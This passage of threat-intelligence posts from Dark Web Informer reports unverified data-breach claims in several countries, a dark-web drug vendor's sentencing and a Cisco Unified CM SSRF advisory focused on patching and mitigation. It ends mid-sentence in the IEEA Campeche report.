Sale A threat actor using the alias **KLINZO007** claims to be selling the full user database of **Tayara** (tayara.tn), described as the largest online classifieds platform in **Tunisia**. The listing advertises **over 2 million records** (about 4 GB) including full names, active mobile numbers, email addresses, and **hashed passwords**, alongside ad and listing data, and is offered via a Telegram/TOX contact. The claim is **unverified** and Tayara has not publicly addressed it. Severity CRITICAL Data2M+ records / 4 GB PriceTelegram sale Country![Tunisia flag](https://flagcdn.com/w40/tn.png)Tunisia ActorKLINZO007 ### ▣Post details TargetTayara (tayara.tn) Country![Tunisia flag](https://flagcdn.com/w40/tn.png)Tunisia SectorOnline Classifieds / Marketplace ClaimFull user database offered for sale Data2,000,000+ records, \~4 GB ObservedJun 5, 2026 PriceTelegram sale ActorKLINZO007 ### !Allegedly exposed - 2,000,000+ user records (claimed) - Full names (first & last) - Active mobile phone numbers - Email addresses - Hashed passwords - Ad titles & descriptions - Listing prices - Categories & locations (Tunisia-wide) ### ◱Screenshot [ ![Tayara Tunisia alleged data leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/298736598273659872365987263598762.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/298736598273659872365987263598762.png) ### ⚠Potential impact If genuine, a database of **2 million+ users** with names, active phone numbers, emails, and hashed passwords would enable large-scale phishing, SMS fraud, and account-takeover attempts (especially if weak password hashes can be cracked) across much of Tunisia's online population. The ad, price, and location data adds context that can make targeted scams more convincing. Record counts and authenticity are unconfirmed. ### iStatus Unverified A data sample and a sale offer were posted to an underground forum, with Telegram and TOX contacts for buyers; the sample records and contact identifiers are not reproduced here. The claim has **not been independently confirmed** and Tayara has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### BRPDV Data Breach: 542K Brazilian Invoices and Customer Records Leaked URL: https://darkwebinformer.com/brpdv-data-breach-542k-brazilian-invoices-and-customer-records-leaked/ Last updated: 2026-06-08T16:08:50.000Z Breach Report ![Brazil flag](https://flagcdn.com/w40/br.png)Brazil Commerce ## BRPDV Data Breach: 542K Brazilian Invoices and Customer Records Leaked A threat actor using the alias **an0bixz** has publicly released what they claim is a full dataset stolen from **BRPDV Ltda.**, a Brazilian company (brpdv.com.br), after an extortion deadline reportedly expired with no payment. The leak advertises **542,675 fiscal documents** (Brazilian NF-e/NFC-e invoices, about 19 GB uncompressed) containing customer **CPF/CNPJ tax IDs**, names, addresses, contact details, and internal company financial data. The claim is **unverified** and BRPDV has not publicly addressed it. Severity CRITICAL Data542K docs / 19 GB PriceFree leak Country![Brazil flag](https://flagcdn.com/w40/br.png)Brazil Actoran0bixz ### ▣Post details TargetBRPDV Ltda. (brpdv.com.br) Country![Brazil flag](https://flagcdn.com/w40/br.png)Brazil SectorRetail / Commerce ClaimFull dataset leaked after failed extortion Data542,675 fiscal documents (\~19 GB) ObservedJun 5, 2026 PriceFree leak (failed extortion) Actoran0bixz ### !Allegedly exposed - 542,675 fiscal documents (claimed) - Customer CPF / CNPJ tax IDs - Full names & addresses - Phone numbers & emails - Product, pricing & invoice totals - Payment methods & masked bank refs - Internal cost centers & profit margins - Supplier lists & client documents ### ◱Screenshot [ ![BRPDV Brazil alleged data leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/74589698723649876234987623982.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/74589698723649876234987623982.png) ### ⚠Potential impact If genuine, a leak of **542,000+ invoices** containing **CPF/CNPJ national tax IDs**, names, addresses, contact details, and even masked bank references would expose both BRPDV's customers and its internal business operations (cost centers, margins, supplier lists) to identity theft, fraud, and competitive harm. CPF and CNPJ are core Brazilian identifiers, which makes the customer data especially sensitive. Because it is a free public release following a failed extortion attempt, the data is likely to spread widely. ### iStatus Unverified The dataset was published for free on an underground forum after the actor's extortion deadline reportedly passed without payment; the download links, file hash, and the company's direct contact details are not reproduced here. The claim has **not been independently confirmed** and BRPDV has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Phish Feed URL: https://darkwebinformer.com/phish-feed/ Last updated: 2026-07-10T19:15:45.000Z _This post is for subscribers only._ ### California Man Gets More Than 26 Years for Running a Dark Web Meth and Fentanyl Store URL: https://darkwebinformer.com/california-man-gets-more-than-26-years-for-running-a-dark-web-meth-and-fentanyl-store/ Last updated: 2026-06-05T18:37:00.000Z A federal judge has sentenced a California man to more than 26 years in federal prison for using a major dark web marketplace to ship methamphetamine and fentanyl across the country. Darren Hughes ran a vendor store on the Nemesis Market, a platform that, before its shutdown, had grown to over 150,000 user accounts and more than 1,100 sellers worldwide. ### How the Operation Worked According to the U.S. Attorney's Office, Hughes drew customers in by offering free samples of methamphetamine through his store. When an undercover agent reached out, he agreed to mail a free sample from California to Chicago, and then on five occasions in 2023 sold the agent meth and fentanyl pills in exchange for cryptocurrency. That payment method was no accident, since Nemesis was designed with built-in money laundering features to obscure the flow of funds. ### The Arrest The investigation closed in that same year, with Hughes arrested in Redwood City, California, in June 2023 after agreeing to sell more meth to undercover agents in Chicago. A search of his vehicle turned up a substantial cache, including roughly 672 grams of meth and a loaded "ghost gun" with no serial number. ### The Scale of Nemesis Market Hughes was one vendor on a platform operating at enormous scale. Founded in 2021, Nemesis was dismantled when German, Lithuanian, and U.S. agencies seized its servers on March 20, 2024, an operation that followed an investigation begun in October 2022\. The U.S. Treasury, which later sanctioned the marketplace's sole administrator, estimated that Nemesis facilitated nearly $30 million worth of drug sales between 2021 and 2024\. Prosecutors in the Hughes case put the order volume at more than 400,000 orders overall, including 17,000 for opioids. ### Conviction and Sentencing The case went to trial, and a federal jury convicted Hughes in November 2025 on drug trafficking charges. On May 26, 2026, U.S. District Judge John F. Kness imposed the sentence. ### A Familiar Playbook In announcing the sentence, U.S. Attorney Andrew S. Boutros noted that he had helped take down the Silk Road nearly 13 years ago. That earlier marketplace ended when its founder, Ross Ulbricht, was sentenced to life in prison in 2015 after his site was used by more than 100,000 buyers to move over $200 million in illegal goods. Boutros warned that traffickers who believe they are beyond the reach of federal law enforcement are mistaken. ### Who Prosecuted the Case The government was represented by Assistant U.S. Attorneys Erin Kelly, Michael Maione, and Hayley Altabef, with assistance from Homeland Security Investigations and the Redwood City Police Department. --- ### References 1. U.S. Attorney's Office, Northern District of Illinois, "Man Sentenced to More Than 26 Years in Prison for Using the Dark Web To Distribute Narcotics," June 5, 2026\. 2. The Hacker News, "German Police Seize 'Nemesis Market' in Major International Darknet Raid," March 24, 2024\. 3. U.S. Department of the Treasury, "Treasury Sanctions Head of Online Darknet Marketplace Tied to Fentanyl Sales," March 2025\. 4. U.S. Attorney's Office, Southern District of New York, "Ross Ulbricht, A/K/A 'Dread Pirate Roberts,' Sentenced In Manhattan Federal Court To Life In Prison," May 29, 2015\. ### Tradeify Data Breach: Hacker Claims to Leak 240K+ Customer Records URL: https://darkwebinformer.com/tradeify-data-breach-hacker-claims-to-leak-240k-customer-records/ Last updated: 2026-06-05T18:37:15.000Z Breach Report ![United States flag](https://flagcdn.com/w40/us.png)United States Finance ## Tradeify Data Breach: Hacker Claims to Leak 240K+ Customer Records A threat actor using the alias **macaroni** claims to have exfiltrated the full customer CRM of **Tradeify**, an online trading platform, by abusing a **Klaviyo private API key that was reportedly hardcoded in the site's client-side JavaScript**. The post advertises **240,174 unique customer profiles**, including full names, emails, phone numbers, physical addresses, and limited purchase history, shared behind a reply gate. The claim is **unverified** and Tradeify has not publicly addressed it. Severity CRITICAL Data240K+ profiles PriceFree leak Country![United States flag](https://flagcdn.com/w40/us.png)United States Actormacaroni ### ▣Post details TargetTradeify (online trading platform) Country![United States flag](https://flagcdn.com/w40/us.png)United States SectorFinancial Services / Trading ClaimFull customer CRM dumped via exposed API key Data240,174 customer profiles (Klaviyo CRM) ObservedJun 5, 2026 PriceFree leak (reply-gated) Actormacaroni (MVP user) ### !Allegedly exposed - 240,174 customer profiles (claimed) - Full names - Email addresses - Phone numbers - Physical addresses (city, state, zip, country) - Purchase history (limited) - Account metadata / custom properties - Klaviyo CRM profile data ### ◱Screenshot [ ![Tradeify alleged data leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/23876952387948972349872365798235.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/23876952387948972349872365798235.png) ### ⚠Potential impact If genuine, a CRM of **240,000+ customer profiles**, names, emails, phone numbers, physical addresses, and purchase history, would be highly valuable for phishing, fraud, and identity theft, made worse by the fact that the victims are users of a financial and trading service. The poster also claims the exposed API key remained active, which, if true, could allow continued data access or tampering until the credential is rotated. Record counts and authenticity are unconfirmed. ### iStatus Unverified Customer profile samples and a claimed exfiltration method were posted to an underground forum behind a reply gate; the sample records and the API credential referenced in the post are not reproduced here. The claim has **not been independently confirmed** and Tradeify has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Viva Entertainment Data Breach: Hackers Claim to Dump 10GB of Internal Data URL: https://darkwebinformer.com/viva-entertainment-data-breach-hackers-claim-to-dump-10gb-of-internal-data/ Last updated: 2026-06-05T16:45:58.000Z Breach Report ![Philippines flag](https://flagcdn.com/w40/ph.png)Philippines Entertainment ## Viva Entertainment Data Breach: Hackers Claim to Dump 10GB of Internal Data A threat actor using the alias **DNH** ("**DeathNoteHackersPH**") claims to have leaked roughly **10 GB** of internal data from **Viva Communications, Inc.** (Viva Entertainment), one of the largest entertainment conglomerates in the Philippines, via its site viva.com.ph. The free dump reportedly includes project permits, internal memos, and **employee and associate email data**, and the poster claims the company was previously breached in 2024 and 2025\. The claim is **unverified** and Viva has not publicly addressed it. Severity HIGH Data10 GB of documents PriceFree dump Country![Philippines flag](https://flagcdn.com/w40/ph.png)Philippines ActorDNH ### ▣Post details TargetViva Communications, Inc. (Viva Entertainment) Country![Philippines flag](https://flagcdn.com/w40/ph.png)Philippines SectorEntertainment / Media ClaimInternal data dump posted for free Data\~10 GB of documents (permits, memos, emails) ObservedJun 5, 2026 PriceFree dump ActorDNH (DeathNoteHackersPH) ### !Allegedly exposed - \~10 GB of internal documents (claimed) - Project permits - Internal memos - Employee email data - Associate / partner email data - Behind-the-scenes business data - Corporate registration details - Executive contact information ### ◱Screenshots [ ![Viva Communications Philippines alleged data leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/923789592873659872635987233.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/923789592873659872635987233.png) [ ![Viva Communications Philippines alleged data leak Screenshot 2](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/923789592873659872635987234.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/923789592873659872635987234.png) ### ⚠Potential impact If genuine, a 10 GB trove of internal corporate documents, permits, memos, and employee and associate email data could expose business operations, enable phishing and impersonation of staff, and aid social engineering against the company and its partners. Because the data is being distributed for free and the firm has reportedly been breached repeatedly, the material could circulate widely. The volume and authenticity are unconfirmed. ### iStatus Unverified A free download (multiple mirror links) and document samples were posted to an underground forum; the links, personal contact details, and individual records shown in the post are not reproduced here. The claim has **not been independently confirmed** and Viva Communications has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Root-Me Leak: Hacker Claims to Dump 15,200 Challenge Files URL: https://darkwebinformer.com/root-me-leak-hacker-claims-to-dump-15-200-challenge-files/ Last updated: 2026-06-05T15:02:10.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Education ## Root-Me Leak: Hacker Claims to Dump 15,200 Challenge Files A threat actor using the alias **Kiria** claims to have leaked an archive tied to **Root-Me**, the popular French cybersecurity training and CTF platform. The post describes a "scrapbook" of **15,200 files across 660 folders** organized by challenge category, such as web, steganography, forensics, cryptanalysis, and cracking, shared via free download links. The post does not mention user or personal data, and the claim is **unverified**; Root-Me has not publicly addressed it. Severity LOW Data15.2K files PriceFree download Country![France flag](https://flagcdn.com/w40/fr.png)France ActorKiria ### ▣Post details TargetRoot-Me (root-me.org) Country![France flag](https://flagcdn.com/w40/fr.png)France SectorEducation / Cybersecurity Training ClaimChallenge archive shared for free Data15,200 files, 660 folders ObservedJun 5, 2026 PriceFree download ActorKiria (GOD rank) ### !Allegedly exposed - 15,200 files / 660 folders (claimed) - Challenge content "scrapbook" - Web server & web client challenges - Network (reseau) challenges - Steganography challenges - Forensics challenges - Cryptanalysis challenges - Cracking & programming challenges ### ◱Screenshot [ ![Root-Me alleged data leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/1273986578263498723164987324612.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/1273986578263498723164987324612.png) ### ⚠Potential impact The leak appears to consist of **challenge content and files** rather than user or personal data, so the direct privacy risk to individuals is limited. The main impact would be to the platform itself: if the archive includes challenge solutions or source materials, it could spoil challenges and undermine the training value of the site. The 15,200-file figure is the poster's claim and is unverified. ### iStatus Unverified A file listing and free download links were posted to an underground forum; the download links, security codes, and contact details are not reproduced here. The claim has **not been independently confirmed** and Root-Me has not publicly addressed it. Such "archive" dumps are sometimes incomplete or recycled. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots, check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/). [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Daily Dose of Dark Web Informer - June 4th, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-june-4th-2026/ Last updated: 2026-06-04T22:26:26.000Z Dark Web Informer # Daily Threat Intelligence Digest Real-time breach tracking, ransomware activity, and dark-web monitoring. **23** SIGNALS TODAY **3** REPORTS REAL-TIME Data Access 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms [/socials ↗](https://darkwebinformer.com/socials) Reach 🔥 Advertising Opportunities Reach a highly engaged audience. [View details →](https://darkwebinformer.com/advertising) 90.9k Unique Visitors 170.6k Pageviews LAST 30 DAYS · AS OF 2026-06-04 · NEXT UPDATE 07-04 Premium 🔒 Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) Classification Key 📰**Law Enforcement** \- LEA updates, investigations ⚠️**Dark Web Notices** \- forums, markets, announcements ❗️**Urgent Threats** \- breaches, ransomware, vulnerabilities 💡**Insights & Tools** \- guides, OSINT, learning resources █ Today's Intelligence 23 ENTRIES Threat Intelligence · Reports REPORT❗️[Threat Actor Claims to Sell a Carvivo Automotive Lead Database Affecting Millions in France](https://darkwebinformer.com/threat-actor-claims-to-sell-a-carvivo-automotive-lead-database-affecting-millions-in-france/) REPORT❗️[IEEA Campeche Data Breach: Hackers Claim to Leak Staff and Student Records](https://darkwebinformer.com/threat-actor-claims-to-leak-a-database-from-ieea-campeche-inea-gob-mx-in-mexico/) REPORT❗️[SSRF to Root: Unauthenticated File-Write Flaw in Cisco Unified CM (CVE-2026-20230)](https://darkwebinformer.com/ssrf-to-root-unauthenticated-file-write-flaw-in-cisco-unified-cm-cve-2026-20230/) X / Twitter Updates NOTICE❗️[A threat actor known as DozerMx is distributing a dataset allegedly scraped from the Bogotá Secretary of Education (SED) in Colombia.](https://x.com/DarkWebInformer/status/2062551048431010254?s=20) NOTICE❗️[A threat actor known as JeffData is selling a dataset allegedly scraped from HungerStation, a major food delivery platform in Saudi Arabia.](https://x.com/DarkWebInformer/status/2062554778480050353?s=20) NOTICE❗️[A threat actor known as Japoy is selling a dataset allegedly scraped from the Environmental Management Bureau of the Philippines, a government agency.](https://x.com/DarkWebInformer/status/2062561717150789807?s=20) NOTICE❗️[A threat actor known as jordanbelfortwolf is selling access to a bot offering banking leads allegedly tied to customers of major Spanish banks, including CaixaBank, Banco Santander, BBVA, Banco Sabadell, ING, Bankinter, and others.](https://x.com/DarkWebInformer/status/2062565813261885577?s=20) NOTICE❗️[A threat actor known as S646 is selling a dataset allegedly scraped from Pôle Emploi, the French government employment agency.](https://x.com/DarkWebInformer/status/2062567799680114990?s=20) NOTICE❗️[A threat actor known as neat is selling what they claim is the entire population dataset of an unnamed European country, with the specific country said to be revealed only after proof of funds.](https://x.com/DarkWebInformer/status/2062571936803168556?s=20) NOTICE❗️[A threat actor known as Black0ut\_Exi is distributing a dataset allegedly scraped from the Human Resources department of the government of Salta, a province in Argentina.](https://x.com/DarkWebInformer/status/2062586154738995303?s=20) UPDATE💡[Wanted to introduce the Scan screenshot feature that is coming to Threat Feed 3.0 later this month...](https://x.com/DarkWebInformer/status/2062592476859244601?s=20) NOTICE❗️[A threat actor known as MrDarkRoot is selling a dataset allegedly containing citizen records from the Republic of Kenya, with a separate folder said to exist for each individual.](https://x.com/DarkWebInformer/status/2062597000005103680?s=20) NOTICE❗️[A threat actor known as nearlevrai is selling two datasets allegedly tied to L'Assurance Maladie, the French national health insurance system, and Colis Privé, a French parcel delivery company.](https://x.com/DarkWebInformer/status/2062605368220430541?s=20) NOTICE❗️[A threat actor known as Z3usOlymp, posting under the Olympus\_Group banner, is distributing a dataset allegedly scraped from Mexico's Secretaría de Salud (Ministry of Health).](https://x.com/DarkWebInformer/status/2062615235769286862?s=20) NOTICE❗️[Baker Distributing Company has had a data leak by ShinyHunters](https://x.com/DarkWebInformer/status/2062625765942865956?s=20) NOTICE❗️[A threat actor known as vvvv, posting under the INF GRUPA banner, is distributing a dataset allegedly scraped from http://Vladars.rs, the official portal of the Government of Republika Srpska in Bosnia and Herzegovina.](https://x.com/DarkWebInformer/status/2062627451923054873?s=20) NOTICE❗️[A threat actor known as 2019 is distributing a dataset allegedly from R.I.C. Publications, an Australian educational publishing company that produces teaching resources and student workbooks for schools.](https://x.com/DarkWebInformer/status/2062628941492588685?s=20) NOTICE❗️[A threat actor known as webscn is distributing a dataset allegedly from the International Judo Federation (IJF), the global governing body for the sport of judo.](https://x.com/DarkWebInformer/status/2062631642250743934?s=20) NOTICE⚠️[Dark Matter Market is currently undergoing payment system maintenance. There is currently no indication of an exit, but stay aware.](https://x.com/DarkWebInformer/status/2062632462430134360?s=20) NOTICE❗️[A threat actor known as misere is distributing a dataset allegedly tied to http://Purvapor.fr/ch, an online retailer operating in France and Switzerland, reportedly obtained via a webshell on a linked website.](https://x.com/DarkWebInformer/status/2062635752639299966?s=20) UPDATE💡[Brave markets itself as an ad blocker.](https://x.com/DarkWebInformer/status/2062643908455117087?s=20) NOTICE❗️[A threat actor known as Masterbyte is selling a dataset allegedly tied to Hyundai Steel Mexico, the Mexican subsidiary of Korea's Hyundai Steel, based in Pesquería, Nuevo León.](https://x.com/DarkWebInformer/status/2062649366087622744?s=20) NOTICE❗️[A threat actor known as Darkode1 is advertising a crypto-draining service via cryptdrainer\[.\]com, marketing malicious tools designed to empty victims' cryptocurrency wallets.](https://x.com/DarkWebInformer/status/2062651829528231985?s=20) [darkwebinformer.com](https://darkwebinformer.com/) · [socials](https://darkwebinformer.com/socials) · [subscribe](https://darkwebinformer.com/pricing) · [donate](https://darkwebinformer.com/donations/) © DARK WEB INFORMER · ALL RIGHTS RESERVED ### SSRF to Root: Unauthenticated File-Write Flaw in Cisco Unified CM (CVE-2026-20230) URL: https://darkwebinformer.com/ssrf-to-root-unauthenticated-file-write-flaw-in-cisco-unified-cm-cve-2026-20230/ Last updated: 2026-06-04T16:46:59.000Z Critical CVSS 3.1 8.6 Cisco SIR Critical Exploit Public PoC # SSRF to Root: Unauthenticated File-Write Flaw in Cisco Unified CM (CVE-2026-20230) Cisco Unified Communications Manager • CWE-918 SSRF • Published 2026-06-03 ## Vulnerability Overview [CVE-2026-20230](https://nvd.nist.gov/vuln/detail/CVE-2026-20230) is an unauthenticated, remote **server-side request forgery (SSRF)** vulnerability in Cisco Unified Communications Manager (Unified CM) and Unified CM Session Management Edition (Unified CM SME). It carries a CVSS v3.1 base score of **8.6 (High)**, but [Cisco assigned it a Critical Security Impact Rating](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cucm-ssrf-cXPnHcW) rather than High, because successful exploitation can let an attacker write files to the underlying operating system and ultimately elevate to root. Public proof-of-concept exploit code is already circulating, which meaningfully lowers the barrier to attack. CVE ID CVE-2026-20230 CVSS Score 8.6 - High Cisco SIR Critical Weakness CWE-918 Affected Product Unified CM / SME Prerequisite WebDialer Enabled Attack Vector Network / Unauthenticated Exploit Status Public PoC Bottom Line If your Unified CM or Unified CM SME deployment has the WebDialer service enabled, you are exposed. Patch to a fixed release now, and disable WebDialer as an immediate stopgap if you cannot patch right away. ## Why Unified CM Is a High-Value Target Unified CM is the call-control core of Cisco's enterprise voice and collaboration stack, handling call routing, device registration, and telephony services for entire organizations. These systems frequently sit on internal networks with broad reachability, and many are exposed to wider access than their owners assume. A flaw that grants an unauthenticated attacker file-write access on the underlying OS, with a credible path to root, turns the communications backbone into a foothold for deeper compromise. SSRF on this kind of appliance is also valuable on its own, since it lets an attacker pivot to internal services and endpoints that would otherwise be unreachable. ## Technical Analysis The root cause is improper input validation for specific HTTP requests processed by the **WebDialer service**. An unauthenticated attacker sends a crafted HTTP request to an affected device, and the flawed validation lets that request trigger SSRF behavior, coercing the server into making requests the attacker controls. The CVSS vector (`AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N`) tells the story: network-reachable, low complexity, no privileges or user interaction, a changed scope, and a high integrity impact, which reflects the ability to write files rather than merely read data. That file-write capability is what elevates the real-world severity beyond the 8.6 score. According to researchers analyzing the public PoC, the SSRF primitive can be used to write malicious files to sensitive locations on disk. Those files can subsequently be executed or used to manipulate system processes, providing the stepping stone Cisco describes for elevating privileges to root. In other words, a single crafted request is the entry point to a chain that ends in full system control. One important constraint: exploitation requires the WebDialer service to be running. WebDialer is disabled by default, so a stock installation is not immediately vulnerable, but the service is commonly enabled in enterprise click-to-call deployments, which is exactly where the exposure concentrates. ## Exploitation Status At disclosure, [Cisco's PSIRT confirmed it is aware of publicly available proof-of-concept exploit code](https://www.bleepingcomputer.com/news/security/cisco-warns-of-critical-unified-cm-flaw-with-poc-exploit-code/) for CVE-2026-20230 but had not yet found evidence of active exploitation or targeting in the wild. That gap rarely lasts. [Reporting on the released PoC](https://gbhackers.com/poc-exploit-released-for-cisco/) notes it demonstrates SSRF-based file-writing, the precise behavior an attacker would weaponize for persistence or escalation, which makes internet-facing or loosely segmented Unified CM systems a likely near-term target. Treat the published PoC as a countdown rather than a reassurance. ## Am I Affected? You are potentially affected if you run Unified CM or Unified CM SME with the WebDialer service enabled. To check the service status, log in to the Cisco Unified CM Administration interface, open **Cisco Unified Serviceability**, and review the **Cisco WebDialer Web Service** under `Control Center - Feature Services`. If the service shows as Started, the system should be considered vulnerable until patched. ## Affected Versions & Fixes | Product | Condition | Resolution | | ---------------- | ------------------ | --------------------------------------------------------------------------------- | | Unified CM / SME | WebDialer enabled | Upgrade to a fixed release: 14SU6 or 15SU5 (or apply the Cisco-provided COP file) | | Unified CM / SME | WebDialer disabled | Not exploitable in this state; still patch on your normal cycle | Cisco notes there are no workarounds that fully address the vulnerability. Disabling WebDialer is an effective mitigation, not a fix, and the durable resolution is to move to a patched maintenance release. ## Mitigation & Remediation Priority order, drawn from the [Cisco security advisory (cisco-sa-cucm-ssrf-cXPnHcW)](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cucm-ssrf-cXPnHcW): 1. **Patch to a fixed release.** Install Cisco Unified CM 14SU6 or 15SU5, or apply the COP (Cisco Options Package) patch where a full maintenance upgrade is not yet practical. This is the only complete fix. 2. **Disable WebDialer if you cannot patch immediately.** In Unified CM Administration, choose Cisco Unified Serviceability from the Navigation menu, open Tools, then Service Activation, and under CTI Services uncheck **Cisco WebDialer Web Service** and save. This blocks the attack path until the patch is applied. 3. **Restrict network exposure.** Ensure Unified CM management and service interfaces are not reachable from untrusted networks, and place them behind segmentation and access controls. 4. **Monitor for abuse.** Watch for anomalous HTTP requests to WebDialer endpoints, unexpected outbound requests originating from the Unified CM host (a hallmark of SSRF), and new or modified files in sensitive locations. ## The Bigger Picture CVE-2026-20230 continues a run of serious Unified CM issues. In January 2026, Cisco fixed a separate critical Unified CM flaw, [CVE-2026-20045](https://www.bleepingcomputer.com/news/security/cisco-warns-of-critical-unified-cm-flaw-with-poc-exploit-code/), that was exploited as a zero-day in remote code execution attacks, and the platform has seen recurring problems around static credentials and input validation. The pattern is a reminder that communications infrastructure deserves the same patch discipline, segmentation, and monitoring as any internet-adjacent application. When a single unauthenticated request can write files on a call-control server, the distance from that server to the rest of the environment is shorter than it looks. ## References - [Cisco Security Advisory - cisco-sa-cucm-ssrf-cXPnHcW](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cucm-ssrf-cXPnHcW) - [NVD - CVE-2026-20230](https://nvd.nist.gov/vuln/detail/CVE-2026-20230) - [BleepingComputer - Cisco Warns of Critical Unified CM Flaw with PoC](https://www.bleepingcomputer.com/news/security/cisco-warns-of-critical-unified-cm-flaw-with-poc-exploit-code/) - [GBHackers - PoC Exploit Released for Cisco Unified CM](https://gbhackers.com/poc-exploit-released-for-cisco/) - [Cybersecurity News - Unified CM Vulnerability Exposed with PoC](https://cybersecuritynews.com/cisco-unified-communications-manager-vulnerability/) - [The Hacker Wire - Unauthenticated SSRF to Root Privilege Escalation](https://www.thehackerwire.com/cisco-unified-cm-unauthenticated-ssrf-to-root-privilege-escalation/) ### IEEA Campeche Data Breach: Hackers Claim to Leak Staff and Student Records URL: https://darkwebinformer.com/threat-actor-claims-to-leak-a-database-from-ieea-campeche-inea-gob-mx-in-mexico/ Last updated: 2026-06-03T19:41:40.000Z Breach Report ![Mexico flag](https://flagcdn.com/w40/mx.png)Mexico Government ## IEEA Campeche Data Breach: Hackers Claim to Leak Staff and Student Records A threat actor using the alias **l1ghtSoulHem**, posting for "**SoulHemTeam**," claims to have breached the **IEEA** (State Institute for Adult Education) in **Campeche, Mexico**, and leaked a database tied to **campeche.inea.gob.mx**. The post lists exposed fields including full names, phone numbers, emails, **CURP** national IDs, salaries, and staff and student records, and links to a Telegram channel. The claim is **unverified** and the institute has not publicly addressed it. Severity HIGH DataStaff + student data PriceFree leak Country![Mexico flag](https://flagcdn.com/w40/mx.png)Mexico Actorl1ghtSoulHem ### ▣Post details TargetIEEA Campeche (Instituto Estatal de Educación para Adultos) Country![Mexico flag](https://flagcdn.com/w40/mx.png)Mexico SectorGovernment / Education ClaimDatabase leak posted (breach claimed) DataStaff & student records (names, CURP, salaries) ObservedJun 3, 2026 PriceFree leak Actorl1ghtSoulHem (SoulHemTeam) ### !Allegedly exposed - Full names (staff & students) - Phone numbers - Email addresses - CURP national identifiers - Employee / worker records - Student records - Salary information - State agency directory data ### ␱Screenshot [ ![IEEA Campeche Mexico alleged data leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/789236598762349876235987239875669872.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/789236598762349876235987239875669872.png) ### ⚠Potential impact If genuine, the exposure of names, **CURP national IDs**, phone numbers, emails, and salary data for staff and students of a state education institute could enable identity theft, impersonation, and targeted fraud against affected individuals. CURP is a unique, lifelong identifier in Mexico, which makes it especially valuable to attackers. No record count was stated, so the size of the dataset is unclear. ### iStatus Unverified A breach was claimed and a sample staff directory was posted to an underground forum, with a Telegram channel for distribution; the sample records and channel are not reproduced here. The claim has **not been independently confirmed**, and the institute and Campeche 